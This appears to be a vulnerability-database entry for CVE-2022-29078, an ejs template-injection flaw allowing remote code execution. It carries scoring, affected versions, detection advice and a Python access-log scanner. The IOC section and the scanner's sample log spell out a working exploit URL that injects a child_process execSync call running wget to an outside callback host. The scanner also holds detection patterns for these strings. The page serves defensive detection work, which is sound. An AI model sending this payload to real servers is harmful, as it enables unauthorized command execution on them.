CVE-2022-29078
published 2022-04-25

Priority: P185 critical, CVSS 3.1 score 9.8
CVSS vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: ITW, EXPLOIT, VulnCheck KEV, Initial access
Exploited in the wild
EPSS: 32.39% (98.1 percentile)
The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).

Affected (3 ranges)

| Vendor | Product  | Version range                   | Fixed in                   |
| debian | node-ejs | < node-ejs 3.1.7-1 (bookworm)   | node-ejs 3.1.7-1 (bookworm) |
| ejs    | ejs      |                                 |                            |
| ejs    | ejs      | >= 0 < 3.1.7                    | 3.1.7                      |

Detection & IOCs (extracted from sources)

url: GET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s HTTP/1.1
command: settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('wget+http://{{interactsh-url}}');s
path: /page?id=<randstr>&settings[view options][outputFunctionName]=<payload>
  • Detect SSTI exploitation attempts targeting the EJS outputFunctionName parameter via HTTP query string. Look for the pattern 'settings[view' or 'outputFunctionName' in URL query parameters, especially combined with Node.js process/child_process invocations.
  • Monitor HTTP requests containing URL-encoded child_process or execSync strings in query parameters, which indicate active exploitation of CVE-2022-29078 RCE payload delivery.
  • Alert on HTTP responses containing 'You are viewing page number' as a confirmation of successful EJS template rendering, which can be used to confirm a vulnerable EJS endpoint.
  • Out-of-band (OOB) HTTP callback detection: exploitation payloads use wget or similar tools to beacon to an external URL. Monitor for unexpected outbound HTTP requests from Node.js/EJS application processes.
  • The vulnerability is specific to EJS version 3.1.6 for Node.js. Versions 3.1.7 and above (and Debian-patched 2.5.7-3+deb11u1) are not affected. Ensure version fingerprinting is part of detection triage.
  • The attack vector requires the application to pass user-controlled input into EJS render settings (specifically the 'view options' namespace). Applications that do not expose this parameter path are not exploitable even on vulnerable EJS versions.
  • Several Red Hat packages are listed as 'Not affected' or 'Will not fix', meaning presence of EJS 3.1.6 in a container image does not automatically imply exploitability; the context in which EJS is invoked matters.
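The query-string indicators listed above, turned into a small access-log scanner. This is an added example, not code from this page's sources or from the ejs project; the log format, the indicator names and the sample log lines are assumptions constructed for the demonstration. It URL-decodes the query twice so that double-encoded keys are still caught, and rates a hit as high only when an EJS settings key and a Node.js execution primitive appear together.

```python
import re
from urllib.parse import unquote_plus

# Indicator patterns from the CVE-2022-29078 detection guidance: the EJS
# "view options" settings path, the outputFunctionName key, and Node.js
# process/child_process invocations. Names are assumed, not standardised.
INDICATORS = [
    ("ejs_view_options", re.compile(r"settings\[view options\]", re.I)),
    ("ejs_outputFunctionName", re.compile(r"outputFunctionName", re.I)),
    ("node_child_process", re.compile(r"child_process|execSync|process\.mainModule", re.I)),
]

# Assumed Common Log Format: client, ident, user, [timestamp], "METHOD path proto", status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def decode_query(path):
    """Return the query string after two rounds of URL decoding (defeats double-encoding)."""
    query = path.partition("?")[2]
    return unquote_plus(unquote_plus(query))


def scan_line(line):
    """Return (ip, path, [indicator names]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = decode_query(m.group("path"))
    hits = [name for name, rx in INDICATORS if rx.search(query)]
    return m.group("ip"), m.group("path"), hits


def scan_log(lines):
    """Return one alert dict per line that matches at least one indicator."""
    alerts = []
    for line in lines:
        parsed = scan_line(line)
        if not parsed or not parsed[2]:
            continue
        ip, path, hits = parsed
        ejs_key = any(h.startswith("ejs_") for h in hits)
        severity = "high" if ejs_key and "node_child_process" in hits else "medium"
        alerts.append({"ip": ip, "path": path, "hits": hits, "severity": severity})
    return alerts


# Constructed sample log lines (not real traffic): a benign request, the
# payload shape from this page's IOCs, and a double-encoded variant of the key.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Apr/2022:10:00:01 +0000] "GET /page?id=42 HTTP/1.1" 200 512',
    '203.0.113.9 - - [25/Apr/2022:10:00:02 +0000] "GET /page?id=abc&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://example.invalid%27);s HTTP/1.1" 200 512',
    '203.0.113.9 - - [25/Apr/2022:10:00:03 +0000] "GET /page?settings%5Bview%2520options%5D%5BoutputFunctionName%5D=x HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["severity"], alert["ip"], alert["hits"])
```

Pair the "high" alerts with the version check and outbound-connection monitoring described above before treating a hit as confirmed exploitation; the medium-severity hits are worth triage because the key itself has no legitimate reason to appear in a query string.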

CVSS provenance

| Source        | Version | Score | Severity | Vector                                       |
| nvd           | v3.1    | 9.8   | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd           | v2.0    | 7.5   | HIGH     | AV:N/AC:L/Au:N/C:P/I:P/A:P                   |
| osv           |         | 9.8   | CRITICAL |                                              |
| vulncheck     |         | 9.8   | CRITICAL |                                              |
| vendor_debian |         | 9.8   | CRITICAL |                                              |
| vendor_redhat |         | 9.8   | CRITICAL |                                              |